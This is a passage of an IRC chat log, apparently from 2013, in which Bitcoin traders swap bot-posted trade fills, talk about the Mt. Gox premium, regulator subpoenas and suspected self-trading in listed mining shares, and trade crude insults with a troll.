@ 0.028 = 10.024 BTC [+] Aug 14 14:32:09 lol it's getting real. https://bitcointalk.org/index.php?topic=263684.msg2928781#msg2928781 Aug 14 14:32:51 lol Aug 14 14:34:16 [BTCTC] [DMS.MINING] 20 @ 0.003207 = 0.0641 BTC [+] Aug 14 14:34:18 [BTCTC] [AMETHYST] 50000 @ 3.001587 = 150000.7935 BTC [+] Aug 14 14:34:48 hahaha Aug 14 14:35:10 [BTCTC] [DMS.MINING] 3 @ 0.003206 = 0.0096 BTC [-] Aug 14 14:35:11 [BTCTC] [DMS.MINING] 100 @ 0.003203 = 0.3203 BTC [-] Aug 14 14:35:31 o look! Aug 14 14:35:40 btctc monthly volume just went up 10%! Aug 14 14:36:18 [HAVELOCK] [XBOND] 785 @ 0.0010487 = 0.8232 BTC [-] Aug 14 14:36:55 [HAVELOCK] [XBOND] 785 @ 0.0010487 = 0.8232 BTC [-] Aug 14 14:36:58 [HAVELOCK] [XBOND] 1 @ 0.0010486 BTC [-] Aug 14 14:37:17 "Thank you, all divs have been paid so far. We will continue to be the trendsetter in this industry that we are very passionate about. With new and better improved million dollar ideas." Aug 14 14:37:23 VanCleef you magnificent bastard. Aug 14 14:37:32 trendsetter, eh ? Aug 14 14:37:38 here's a thought : organise a conference too. Aug 14 14:38:50 Soccum Tigris Pupa lmao Aug 14 14:39:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00105 BTC [+] Aug 14 14:40:06 hehe, well he did pay .1 to those guys Aug 14 14:42:26 the power of ten buz. Aug 14 14:42:28 bu Aug 14 14:42:29 x( Aug 14 14:43:00 [BTCTC] [TAT.MINIGAME] 100 @ 0.000221 = 0.0221 BTC [-] Aug 14 14:43:00 [BTCTC] [TAT.MINIGAME] 20 @ 0.000221 = 0.0044 BTC [-] Aug 14 14:50:40 [BTCTC] [COG.F2] 1 @ 5.31 BTC [-] Aug 14 14:55:29 ok so Aug 14 14:55:38 bitstamp limited is from july 2012 Aug 14 14:55:57 there were 2 bitstamps, one in slo and one in uk Aug 14 14:56:09 grossus bought an empty shell apparently Aug 14 14:56:13 which is strange Aug 14 14:58:37 related doc http://smpake.com/blREX+GJ0217-54065_0-09230811.pdf Aug 14 14:59:55 [BTCTC] [ASICMINER-PT] 1 @ 4.003 BTC [-] Aug 14 15:00:01 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 14 15:01:50 [HAVELOCK] [XBOND] 2 @ 0.0010486 = 0.0021 BTC [-] Aug 14 15:02:35 [HAVELOCK] [XBOND] 2 @ 0.0010486 = 0.0021 BTC [-] Aug 14 15:02:54 [BTCTC] [KENILWORTH] 10 @ 0.001796 = 0.018 BTC [+] Aug 14 15:02:55 [BTCTC] [KENILWORTH] 34 @ 0.001796 = 0.0611 BTC [+] Aug 14 15:03:18 lol @ the last few comments mircea Aug 14 15:03:45 kidney pass thru Aug 14 15:05:42 I like the NASDAQ one Aug 14 15:06:21 "secure .txt" isn't far off from how finance works now anyway :p Aug 14 15:07:24 [HAVELOCK] [XBOND] 2 @ 0.0010486 = 0.0021 BTC [-] Aug 14 15:08:02 [BTCTC] [BFMINES] 3 @ 0.001 = 0.003 BTC [+] Aug 14 15:08:40 haha yeah, that nasdaq one was gold Aug 14 15:09:13 [BTCTC] [BFMINES] 2 @ 0.001 = 0.002 BTC [+] Aug 14 15:11:05 [BTCTC] [DMS.MINING] 235 @ 0.003202 = 0.7525 BTC [-] Aug 14 15:11:15 and bfmines is now trading at 1/4 of unsold ipo price! Aug 14 15:12:14 pankkake here's one for lolz https://bitcointalk.org/index.php?topic=140366.msg2924758#msg2924758 Aug 14 15:12:16 may to august. Aug 14 15:12:39 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00105 = 0.0525 BTC [+] Aug 14 15:12:55 he mentionned 2 weeks, cursed himself Aug 14 15:13:23 anyone have some opinions on the upswing in price today and why? Aug 14 15:13:55 lol Aug 14 15:14:12 lol scrat Aug 14 15:14:24 gesell: maybe this http://video.cnbc.com/gallery/?play=1&video=3000190465 Aug 14 15:16:02 [BTCTC] [COG.F2] 1 @ 5.3 BTC [-] Aug 14 15:16:17 also http://www.reddit.com/r/SilkRoad/comments/1k27az/new_message_from_dpr_publicity_forewarning/ Aug 14 15:17:20 is that message confirmed? (the signature) from dpr? Aug 14 15:17:51 also i dont think SR pulls as much utility weight as it did in 2011 Aug 14 15:18:22 [BTCTC] [BFMINES] 5 @ 0.001 = 0.005 BTC [+] Aug 14 15:19:21 [HAVELOCK] [XBOND] 1 @ 0.0010486 BTC [-] Aug 14 15:20:09 on the CNBC and regulation news it's both positive and negative attention. doesnt really explain the uptick i think Aug 14 15:20:25 who gives a shit about SR Aug 14 15:20:52 degen drug users, hope they OD and their wallets go forever unused Aug 14 15:21:47 well the underlying message was "we want to work with the bitcoin companies together and not crush them down" Aug 14 15:22:09 and i think the general expectation was more negative Aug 14 15:22:28 better for some companies to have an amicable discussion and dealings with regulators Aug 14 15:22:48 i don't see how that would ever impact individual users Aug 14 15:22:55 esp non-americans Aug 14 15:22:58 dexX7 right, because bitcoiners are that redarded, and will take the usg at its word. Aug 14 15:23:05 what's this, an american tv show ? Aug 14 15:24:06 i don't know Aug 14 15:24:29 i guess something like that Aug 14 15:25:01 [BTCTC] [DMS.MINING] 3 @ 0.003379 = 0.0101 BTC [+] Aug 14 15:26:48 the da guy tryes to make it sound as if investment is conditional on we caring about their crap. Aug 14 15:26:56 that's not the deal. the deal is they invest to the point they impress Aug 14 15:26:59 then maybe we listen Aug 14 15:27:01 that's the order. Aug 14 15:29:58 lol Aug 14 15:31:28 [BTCTC] [S.MPOE-PT] 2 @ 0.00087 = 0.0017 BTC [-] Aug 14 15:34:03 http://imgur.com/QGOFjj2 Aug 14 15:34:07 Says it all, doesn't it - Imgur Aug 14 15:43:17 [BTCTC] [KENILWORTH] 10 @ 0.001601 = 0.016 BTC [-] Aug 14 15:43:19 [BTCTC] [KENILWORTH] 2000 @ 0.0016 = 3.2 BTC [-] Aug 14 15:43:41 [BTCTC] [KENILWORTH] 332 @ 0.001502 = 0.4987 BTC [-] Aug 14 15:43:43 [BTCTC] [KENILWORTH] 999 @ 0.001501 = 1.4995 BTC [-] Aug 14 15:43:45 hehe this reminds me of http://www.youtube.com/watch?v=DX1iplQQJTo Aug 14 15:43:45 [BTCTC] [KENILWORTH] 19 @ 0.0015 = 0.0285 BTC [-] Aug 14 15:50:14 [BTCTC] [DMS.MINING] 85 @ 0.003499 = 0.2974 BTC [+] Aug 14 15:50:54 [BTCTC] [DMS.MINING] 10 @ 0.00358 = 0.0358 BTC [+] Aug 14 15:51:12 [BTCTC] [DMS.MINING] 300 @ 0.003589 = 1.0767 BTC [+] Aug 14 15:52:31 [BTCTC] [DMS.MINING] 782 @ 0.00359 = 2.8074 BTC [+] Aug 14 15:52:33 [BTCTC] [DMS.MINING] 56 @ 0.00359 = 0.201 BTC [+] Aug 14 15:58:33 [HAVELOCK] [XBOND] 1 @ 0.0010486 BTC [-] Aug 14 16:11:08 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 14 16:12:44 [BTCTC] [DMS.PURCHASE] 2 @ 0.028 = 0.056 BTC [+] Aug 14 16:13:12 [HAVELOCK] [XBOND] 776 @ 0.0010486 = 0.8137 BTC [-] Aug 14 16:14:26 [BTCTC] [PAJKA.BOND] 1 @ 0.015 BTC [+] Aug 14 16:14:42 [HAVELOCK] [XBOND] 772 @ 0.0010497 = 0.8104 BTC [+] Aug 14 16:15:47 [BTCTC] [BFMINES] 20 @ 0.0015 = 0.03 BTC [+] Aug 14 16:16:29 [HAVELOCK] [XBOND] 13 @ 0.0010497 = 0.0136 BTC [+] Aug 14 16:16:38 [HAVELOCK] [XBOND] 944 @ 0.0010498 = 0.991 BTC [+] Aug 14 16:16:48 [HAVELOCK] [XBOND] 12 @ 0.00104997 = 0.0126 BTC [+] Aug 14 16:16:56 [HAVELOCK] [XBOND] 13 @ 0.00104998 = 0.0136 BTC [+] Aug 14 16:17:04 [HAVELOCK] [XBOND] 30 @ 0.00104999 = 0.0315 BTC [+] Aug 14 16:18:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.028 BTC [+] Aug 14 16:25:09 [BTCTC] [BITVPS] 1 @ 0.002632 BTC [-] Aug 14 16:28:38 [HAVELOCK] [XBOND] 167 @ 0.00105 = 0.1754 BTC [+] Aug 14 16:31:19 http://www.reddit.com/r/Bitcoin/comments/1kbuun/dictionary_attack_on_bitcoin_brainwallets/ wow Aug 14 16:31:22 Dictionary attack on Bitcoin Brainwallets : Bitcoin Aug 14 16:31:35 [MPEX] [S.MPOE] 8400 @ 0.00083482 = 7.0125 BTC [-] Aug 14 16:32:56 dexX7 that's been arouind for years. Aug 14 16:33:37 i know it's obvious Aug 14 16:34:02 but anyway, i dislike the way goes "o, it'sd a bad idea" in spite of not managing to get a single dime. Aug 14 16:34:26 http://www.drudgereportarchives.net/Article.php?ID=430966& Aug 14 16:34:28 DrudgeReportArchives Aug 14 16:40:01 [BTCTC] [LABCOIN] 1 @ 0.001534 BTC [-] Aug 14 16:42:56 heh, printing presses are in overdrive/overload? Aug 14 16:44:25 [BTCTC] [ASICMINER-PT] 1 @ 3.999 BTC [-] Aug 14 16:44:26 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [+] Aug 14 16:44:51 mistakes do happen :D Aug 14 16:45:15 [HAVELOCK] [XBOND] 7 @ 0.00105 = 0.0074 BTC [+] Aug 14 16:45:47 [MPEX] [S.MPOE] 9750 @ 0.00083613 = 8.1523 BTC [+] Aug 14 16:46:40 [BTCTC] [S.BBET-PT] 500 @ 0.002 = 1 BTC [+] Aug 14 16:52:27 [HAVELOCK] [XBOND] 775 @ 0.0010453 = 0.8101 BTC [-] Aug 14 16:52:56 [HAVELOCK] [XBOND] 769 @ 0.0010453 = 0.8038 BTC [-] Aug 14 16:52:59 [HAVELOCK] [XBOND] 2 @ 0.0010452 = 0.0021 BTC [-] Aug 14 16:53:40 [HAVELOCK] [AM100] 10 @ 0.0388986 = 0.389 BTC [+] Aug 14 16:57:00 [BTCTC] [TAT.ASICMINER] 65 @ 0.0402 = 2.613 BTC [-] Aug 14 16:57:00 [BTCTC] [TAT.ASICMINER] 35 @ 0.0402 = 1.407 BTC [-] Aug 14 16:58:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0409 = 0.0818 BTC [+] Aug 14 17:00:04 [HAVELOCK] [XBOND] 2 @ 0.0010452 = 0.0021 BTC [-] Aug 14 17:00:08 [BTCTC] [BASIC-MINING] 1 @ 0.3227 BTC [-] Aug 14 17:00:47 [BTCTC] [BASIC-MINING] 3 @ 0.3227 = 0.9681 BTC [-] Aug 14 17:02:06 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [+] Aug 14 17:04:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0399 = 0.0798 BTC [-] Aug 14 17:06:11 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.001049 = 0.0126 BTC [-] Aug 14 17:06:12 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.001049 = 0.0294 BTC [-] Aug 14 17:06:51 [BTCTC] [DMS.MINING] 10 @ 0.003588 = 0.0359 BTC [-] Aug 14 17:14:09 [BTCTC] [COG.F2] 1 @ 5.3 BTC [-] Aug 14 17:14:31 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 14 17:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.054 BTC [+] Aug 14 17:14:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.04088 = 0.0818 BTC [+] Aug 14 17:14:47 [BTCTC] [TAT.ASICMINER] 35 @ 0.04089 = 1.4312 BTC [+] Aug 14 17:14:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.0409 = 0.3272 BTC [+] Aug 14 17:14:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.04096 = 0.3686 BTC [+] Aug 14 17:15:31 interesting action @ gox huh Aug 14 17:15:36 ;;ticker Aug 14 17:15:37 MtGox BTCUSD ticker | Best bid: 113.00000, Best ask: 113.38679, Bid-ask spread: 0.38679, Last trade: 113.39000, 24 hour volume: 44932.82504628, 24 hour low: 105.71501, 24 hour high: 115.00000, 24 hour vwap: 111.28355 Aug 14 17:15:37 yuea seriously Aug 14 17:15:43 bitstamp down Aug 14 17:15:49 [HAVELOCK] [VTX] 2 @ 0.5615595 = 1.1231 BTC [+] Aug 14 17:15:51 like price Aug 14 17:15:51 [HAVELOCK] [VTX] 2 @ 0.562 = 1.124 BTC [+] Aug 14 17:15:53 [HAVELOCK] [VTX] 2 @ 0.5635 = 1.127 BTC [+] Aug 14 17:15:53 people get out of gox and to bitstamp Aug 14 17:15:55 [HAVELOCK] [VTX] 2 @ 0.56499 = 1.13 BTC [+] Aug 14 17:15:57 [HAVELOCK] [VTX] 3 @ 0.56499 = 1.695 BTC [+] Aug 14 17:15:59 [HAVELOCK] [VTX] 1 @ 0.5678999 BTC [+] Aug 14 17:16:01 [HAVELOCK] [VTX] 2 @ 0.5679 = 1.1358 BTC [+] Aug 14 17:16:02 [HAVELOCK] [VTX] 1 @ 0.56799898 BTC [+] Aug 14 17:16:03 ;;premium mtgox bitstamp Aug 14 17:16:04 [HAVELOCK] [VTX] 1 @ 0.56799899 BTC [+] Aug 14 17:16:05 mtgox premium over bitstamp is currently 12.8636998208 %. Aug 14 17:16:13 damn Aug 14 17:16:18 significant premium Aug 14 17:16:20 yea Aug 14 17:16:23 seriously Aug 14 17:16:32 someone with a lot of cash is gonna take that exposure Aug 14 17:16:45 a 12% bet that gox gives you youre money back Aug 14 17:16:49 thats too much Aug 14 17:16:54 lol Aug 14 17:17:08 If youre a fund with like a couple m,illion bucks to throw at this Aug 14 17:17:15 thats almost a no brainer Aug 14 17:17:51 i wouldnt trust gox with that much money Aug 14 17:17:57 their age long history of incompetence Aug 14 17:19:03 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 14 17:19:04 [BTCTC] [ASICMINER-PT] 1 @ 4.061 BTC [+] Aug 14 17:19:05 [BTCTC] [ASICMINER-PT] 2 @ 4.064 = 8.128 BTC [+] Aug 14 17:19:33 im with taub. Aug 14 17:19:54 throwing money in the black hole would be the exact sort of unique braindamaged thing that'd start a fund on the right foot. Aug 14 17:20:19 they gotta get burned first, to drop the airs and get with the programme. before they get burned they probably think they know shit, like any other noob. Aug 14 17:20:20 I'd trust gox to pay eventualyl Aug 14 17:20:26 not immediatly but within 3 months Aug 14 17:20:29 12% 3 months Aug 14 17:20:33 matuszed like tradehill did ? like bitcoinica did ? like bfl ? Aug 14 17:20:40 you're never seeing it again. Aug 14 17:21:41 12% worth the risk imho Aug 14 17:21:42 mtgox had trust going, they payed through all the debacles so far, but still Aug 14 17:21:48 tradehill is still running Aug 14 17:22:00 they are definitely incompetent Aug 14 17:22:02 and bfl didnt disappear theyre just taking forever Aug 14 17:22:29 taking the cash would be criminal and I dont think Gox is going there right now Aug 14 17:22:33 maybe they are under attack by the us gov, but who can tell Aug 14 17:22:47 The us gov would be more vocal avbout that Aug 14 17:22:52 they aren't really good at communication either, in before a new "victims of our own success" Aug 14 17:24:06 [HAVELOCK] [AM100] 4 @ 0.0381 = 0.1524 BTC [-] Aug 14 17:24:14 matuszed tradehill is still pretending. Aug 14 17:24:19 [HAVELOCK] [AM100] 10 @ 0.038 = 0.38 BTC [-] Aug 14 17:24:36 they split with a bunch of people's dough, gone for a year, came back in the hopes they may pay off a few and sweep it under the rug Aug 14 17:24:41 it didn't work, and so... hangers on. Aug 14 17:25:24 but anyway, this is exactly what i said earlier about getting burned. everyone thinks they know better till they feel the cock up their ass. Aug 14 17:25:48 That got aggressive Aug 14 17:26:24 gotta get the point across somehow. Aug 14 17:28:42 Prince joined twitter? Aug 14 17:28:46 this should be fun Aug 14 17:29:28 Who cares? Prince is so 1980s Aug 14 17:29:42 Lorenzo_Money is on Twitter and THAT is significant Aug 14 17:30:42 LorenzoMoney who are you again ? Aug 14 17:30:58 ThickAsThieves i thought it was the artist formerly known as the artist formerly known. Aug 14 17:31:08 mircea_popescu: I have seen your blog. It would be better if you just took your Thorazine. Aug 14 17:31:14 also, egyptian stock exchange / banks closed Aug 14 17:31:30 state of emergency Aug 14 17:31:32 a, so another one of these ? Aug 14 17:31:42 you know there's an abundance/ Aug 14 17:31:49 Seriously, your pompous writing, and scattered associations and loose reasoning sounds like a high school senior who read a few of his uncle's copies of books by Mircea Eliade and now thinks he is clever Aug 14 17:31:51 Ho hum Aug 14 17:32:19 [BTCTC] [DMS.MINING] 7 @ 0.003587 = 0.0251 BTC [-] Aug 14 17:32:37 what does that make you? Aug 14 17:32:49 the critic of hs seniors? Aug 14 17:32:54 Artificial Cheez Spread in a can Aug 14 17:33:01 wait what ?! Aug 14 17:33:01 Someone has to do it Aug 14 17:33:39 why mircea eliade specifically ? speaking of loose reasoning / scattered associations. Aug 14 17:33:46 and what does that make YOU a critic of critics of HS seniors? Aug 14 17:34:06 Mircea Eliade was brilliat. You are not Mircea Eliade. Aug 14 17:34:15 You act as if you are as smart as him. Aug 14 17:34:57 http://bitcoinventure.com/ Aug 14 17:34:58 the question was why./ Aug 14 17:35:00 Bitcoin Venture Fund Aug 14 17:35:03 thestringpuller: btw, I bought the game on steam. :P Aug 14 17:35:20 these guys wanna hold your bitcoins for you i guess Aug 14 17:35:47 http://www.forbes.com/sites/kashmirhill/2013/08/12/every-important-person-in-bitcoin-just-got-subpoenaed-by-new-yorks-financial-regulator/ Aug 14 17:35:52 Every Important Person In Bitcoin Just Got Subpoenaed By New York's Financial Regulator - Forbes Aug 14 17:36:04 it says all the important people in the bitcoin world got subpoened and you are still upset that you did not get yours Aug 14 17:36:10 guess you are not important Aug 14 17:36:11 LOL Aug 14 17:36:13 :P Aug 14 17:36:16 how do you know i didn't ? Aug 14 17:36:20 my 10 lawyers and i aren't worried Aug 14 17:36:30 haha Aug 14 17:36:46 [BTCTC] [DMS.SELLING] 4 @ 0.02461 = 0.0984 BTC [-] Aug 14 17:37:01 Are your 10 lawyers name Strawberry Shortcake, Pikachu, ANgelHeart, Helpful heartm and Bunny? Aug 14 17:37:06 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 17:37:19 this is getting so repetitive by now. random nut waltzes in here to accuse me of random shit, then proceeds to fall all over himself on the most cursory of examinations. Aug 14 17:37:20 I didnt get subpoenaed either Aug 14 17:37:24 can't we get like... intelligent trolls ? Aug 14 17:37:29 what i love about bitcoin is that you cant regulate it Aug 14 17:37:52 i prefer the dumb trolls, as I take people too seriously, and thus end up getting trolled by the good ones Aug 14 17:38:15 .We believe that . for a number of reasons . putting in place appropriate regulatory safeguards for virtual currencies will be beneficial to the long-term strength of the virtual currency industry,. Aug 14 17:38:18 TAT the fact you werent suboenaed shows that the regulators are still behind Aug 14 17:38:19 this is true tho Aug 14 17:38:21 we need proper exchanges Aug 14 17:38:22 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 17:38:29 We most def need a real exchange Aug 14 17:38:32 [HAVELOCK] [XBOND] 7 @ 0.0010452 = 0.0073 BTC [-] Aug 14 17:38:36 [BTCTC] [ASICMINER-PT] 9 @ 4.067 = 36.603 BTC [+] Aug 14 17:38:57 taub on the facr of it yes it's true. Aug 14 17:39:07 however, i have little confidence in usg's ability to improve anything. Aug 14 17:39:10 coincidentally I am heading to new york in a few days Aug 14 17:39:13 simply on the strength of their record. Aug 14 17:40:00 goat, what? Aug 14 17:40:13 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 17:40:17 you mean btcgarden? Aug 14 17:40:25 they delisted themselves Aug 14 17:40:29 Buyback Aug 14 17:40:40 [BTCTC] [ASICMINER-PT] 3 @ 4.068 = 12.204 BTC [+] Aug 14 17:40:47 security probs i think they said Aug 14 17:40:47 some bullshit story about someone taking legal action against them Aug 14 17:41:20 I think they decided to just internalize the whole operation Aug 14 17:41:57 The main thread on bitcointalk has their official explanation Aug 14 17:42:08 i still think it was a scam Aug 14 17:42:11 just a test Aug 14 17:42:12 [BTCTC] [DMS.SELLING] 16 @ 0.02461 = 0.3938 BTC [-] Aug 14 17:42:13 [BTCTC] [LABCOIN] 25 @ 0.001534 = 0.0384 BTC [-] Aug 14 17:43:11 [BTCTC] [DMS.SELLING] 64 @ 0.02452 = 1.5693 BTC [-] Aug 14 17:43:32 here's what i'm mulling at the moment : Aug 14 17:43:32 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [+] Aug 14 17:43:33 [BTCTC] [ASICMINER-PT] 11 @ 4.07 = 44.77 BTC [+] Aug 14 17:44:11 if indeed anyone bought labcoin that wasn't labcoin/btct, then they were mommentum traders. Aug 14 17:44:15 the mommentum never materialised. Aug 14 17:44:23 it's not getting sold into the ground either. Aug 14 17:44:30 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [+] Aug 14 17:45:23 [HAVELOCK] [XBOND] 40 @ 0.0010452 = 0.0418 BTC [-] Aug 14 17:45:32 ergo, much like btcgarden, this was a 100% in-house selftrade thing. Aug 14 17:45:34 [BTCTC] [DMS.MINING] 100 @ 0.00358 = 0.358 BTC [-] Aug 14 17:45:39 [HAVELOCK] [XBOND] 2 @ 0.0010452 = 0.0021 BTC [-] Aug 14 17:45:52 with labcoin, i think the momentum was def there Aug 14 17:46:10 was. that's the thing. it WAS there. now it's not. where's the sales ? Aug 14 17:46:25 I sold on mine in the first few minutes Aug 14 17:46:29 am i supposed to somehow believe the sort of muppets suddenly and magically became buy and hold investors over a weekend ? Aug 14 17:46:46 some Aug 14 17:46:51 they want the next AM remember Aug 14 17:46:53 Same. was so liquid too when the markets opened Aug 14 17:46:54 !t btct labcoin Aug 14 17:46:56 [BTCT:LABCOIN] 1D: 0.00129 / 0.00152 / 0.001751 (543029 shares, 823.4 BTC), 7D: 0.0011 / 0.00151 / 0.001978 (2634510 shares, 3989.7 BTC), 30D: 0.001 / 0.00151 / 0.0044 (14324831 shares, 21582.1 BTC) Aug 14 17:47:04 nice spread Aug 14 17:47:05 i dunno man. Aug 14 17:47:41 my guess is the owners are slowly dumping shares Aug 14 17:47:49 and rebuying their own with the money Aug 14 17:47:57 yeah, something like that. Aug 14 17:48:04 The price will rise then someone will unload like 100k shares and smack it down Aug 14 17:48:15 its either someone in the company or someone who took down a huge chunk of the ipo Aug 14 17:48:20 matuszed pretty much yeah Aug 14 17:48:34 they probably have a lockout clause for employees Aug 14 17:48:44 lol Aug 14 17:48:46 sure Aug 14 17:48:53 Duffer1 tgey have employees ? the employees got shares ? Aug 14 17:48:54 Sure its strictly enforced Aug 14 17:48:57 was this ever disclosed ? Aug 14 17:49:11 theres a whole thing about this Aug 14 17:49:22 labcoin retained like X million shares Aug 14 17:49:28 that are on the market Aug 14 17:49:34 And then allowed employees to sell Aug 14 17:49:36 but promised not to sell more than 25% Aug 14 17:49:44 of what they hold Aug 14 17:49:58 i pressed them for public portfolio links Aug 14 17:50:07 and gave several ways they could easily show transparency Aug 14 17:50:13 they have yet to oblige Aug 14 17:50:27 [BTCTC] [DMS.SELLING] 14 @ 0.0251 = 0.3514 BTC [+] Aug 14 17:50:38 [BTCTC] [DMS.MINING] 3 @ 0.003587 = 0.0108 BTC [+] Aug 14 17:50:41 this misunderstood freedom really needs to be clipped already. Aug 14 17:51:05 "do it my way" is for being a cowboy, and that means dirt and cow shit. Aug 14 17:51:11 Words strung together which have no meaning in a string but only individually Aug 14 17:51:12 it does not mean playing music etc. Aug 14 17:51:15 i don't see why they wouldn't oblige TaT Aug 14 17:51:40 you dont? Aug 14 17:51:52 hehe Aug 14 17:52:02 well if they were legit, i don't see why they wouldn't oblige Aug 14 17:52:30 Trebuie sa fie cu ajutorul unui program de traducere în limba engleza dvs deoarece este groaznic. Aug 14 17:52:40 is this guy tibby ? Aug 14 17:52:55 who the hell is LorenzoMoney Aug 14 17:53:14 Te crezi destept. Dar, într-adevar, cuvinte mari si pseudo abstract scris înseamna ca sunt o frauda. Aug 14 17:53:36 Hola VanCleef Aug 14 17:53:37 some guy with google translate apparently. Aug 14 17:53:52 It is what you use to translate from Romanian to English Aug 14 17:53:54 [BTCTC] [DMS.SELLING] 136 @ 0.02452 = 3.3347 BTC [-] Aug 14 17:53:56 [BTCTC] [DMS.SELLING] 500 @ 0.0245 = 12.25 BTC [-] Aug 14 17:53:56 comoo estes Aug 14 17:53:56 [BTCTC] [DMS.SELLING] 417 @ 0.0243 = 10.1331 BTC [-] Aug 14 17:54:04 is that romanian? Aug 14 17:54:08 ThickAsThieves not rly. Aug 14 17:54:15 looks like italian or sumth Aug 14 17:54:18 Seriously, friend, your written English is terrible! Time to take some classes from someone other than your Ukranian gilfriend Aug 14 17:54:28 some romance language Aug 14 17:54:40 thats what it looks like Aug 14 17:54:42 ThickAsThieves it's machine trnaslated romanian, more holes than cheese. Aug 14 17:54:44 Romanian actually is related to Italian. It is a romance language and not a slavic language although it has slavic loan words Aug 14 17:54:54 Only swiss has holes Aug 14 17:55:06 But it is to romanian what your english is to real english Aug 14 17:55:07 masdaam has holes too. go learn your cheeses. Aug 14 17:55:20 and stilton has insects. Aug 14 17:56:11 http://2.imimg.com/data2/CF/EU/IMFCP-1257306/massadambig-250x250.jpg Aug 14 17:56:21 [BTCTC] [DMS.PURCHASE] 900 @ 0.028 = 25.2 BTC [+] Aug 14 17:56:35 [BTCTC] [BITVPS] 91 @ 0.002683 = 0.2442 BTC [+] Aug 14 17:57:13 pompoase Aug 14 17:57:22 i think we all knew what mp meant, didnt need to turn into cheese lawyering Aug 14 17:57:23 actually gouda will get holes too, if you let it. Aug 14 17:57:43 ThickAsThieves cheese detectives! Aug 14 17:58:15 first case: Aug 14 17:58:20 Who moved my cheese? Aug 14 17:58:57 (not sure if that book is world-known...) Aug 14 17:58:58 it was blocking my way to untold riches Aug 14 17:59:27 "Last time on Joe Scmoe, Cheese Detective : Sir, someone has been giving the King horns and got the Queen pregnant. All we have to go on is this little bit of left over cheese a maid found making the bed..." Aug 14 18:00:13 wow. Aug 14 18:00:22 brendio is back ? Aug 14 18:01:53 I actually own that book Aug 14 18:02:14 (Who moved my cheese) Aug 14 18:02:42 [BTCTC] [NASTY-PT] 25 @ 0.00523 = 0.1308 BTC [+] Aug 14 18:02:43 [BTCTC] [NASTY-PT] 6 @ 0.005233 = 0.0314 BTC [+] Aug 14 18:02:43 some chinese fellow mentioned that garden is _very well funded and the ipo was solely a marketing thing Aug 14 18:02:44 [BTCTC] [NASTY-PT] 169 @ 0.0053 = 0.8957 BTC [+] Aug 14 18:03:23 dexX7 they show some proof ? Aug 14 18:03:50 of course not Aug 14 18:03:53 ofc not Aug 14 18:03:54 yes Aug 14 18:04:07 and given the huge amount they raised, it would mean they have even more? Aug 14 18:04:47 one could check the background of the returned 32k Aug 14 18:04:52 the tx was posted on btctalk Aug 14 18:05:35 [HAVELOCK] [XBOND] 21 @ 0.0010452 = 0.0219 BTC [-] Aug 14 18:05:44 [HAVELOCK] [XBOND] 2 @ 0.0010452 = 0.0021 BTC [-] Aug 14 18:06:33 https://blockchain.info/tx/c7a36aaadf94e010236601a673f9cc6b36ac5cabb1bad7f50a25d75bc41f0f3b Aug 14 18:06:35 Bitcoin Transaction c7a36aaadf94e010236601a673f9cc6b36ac5cabb1bad7f50a25d75bc41f0f3b Aug 14 18:07:00 i have no proof that this is the tx, was just posted, too Aug 14 18:07:09 http://benswann.com/obamacare-provision-forced-home-inspections/ Aug 14 18:07:13 OBAMACARE PROVISION: “FORCED” HOME INSPECTIONS | Ben Swann Full Disclosure Aug 14 18:07:49 lol wow Aug 14 18:07:59 [BTCTC] [DMS.MINING] 4 @ 0.0035 = 0.014 BTC [-] Aug 14 18:08:00 [BTCTC] [DMS.MINING] 15 @ 0.003351 = 0.0503 BTC [-] Aug 14 18:08:01 meant to say what, but wow works too Aug 14 18:08:01 [BTCTC] [DMS.MINING] 300 @ 0.00335 = 1.005 BTC [-] Aug 14 18:08:02 [BTCTC] [DMS.MINING] 29 @ 0.003333 = 0.0967 BTC [-] Aug 14 18:08:03 [BTCTC] [DMS.MINING] 26 @ 0.003211 = 0.0835 BTC [-] Aug 14 18:08:04 [BTCTC] [DMS.MINING] 40 @ 0.003205 = 0.1282 BTC [-] Aug 14 18:08:05 [BTCTC] [DMS.MINING] 209 @ 0.003202 = 0.6692 BTC [-] Aug 14 18:08:36 [BTCTC] [BFMINES] 5 @ 0.00165 = 0.0083 BTC [+] Aug 14 18:09:52 it definitely looks like it, and the other related adresses haven't seen much btcs Aug 14 18:09:56 [BTCTC] [DMS.SELLING] 83 @ 0.0243 = 2.0169 BTC [-] Aug 14 18:09:57 [BTCTC] [DMS.SELLING] 77 @ 0.02423 = 1.8657 BTC [-] Aug 14 18:09:59 [BTCTC] [DMS.SELLING] 28 @ 0.0242 = 0.6776 BTC [-] Aug 14 18:10:01 [BTCTC] [DMS.SELLING] 76 @ 0.0241 = 1.8316 BTC [-] Aug 14 18:10:02 [BTCTC] [DMS.SELLING] 15 @ 0.0241 = 0.3615 BTC [-] Aug 14 18:10:03 [BTCTC] [DMS.SELLING] 25 @ 0.0241 = 0.6025 BTC [-] Aug 14 18:10:04 http://bcoinnews.com/2013/08/14/kncminer-case-fans/ Aug 14 18:10:04 [BTCTC] [DMS.SELLING] 36 @ 0.024 = 0.864 BTC [-] Aug 14 18:10:05 [BTCTC] [DMS.SELLING] 3 @ 0.02325 = 0.0698 BTC [-] Aug 14 18:10:10 no comment on that Aug 14 18:10:22 should it go into humor? Aug 14 18:10:51 haha Aug 14 18:11:29 [BTCTC] 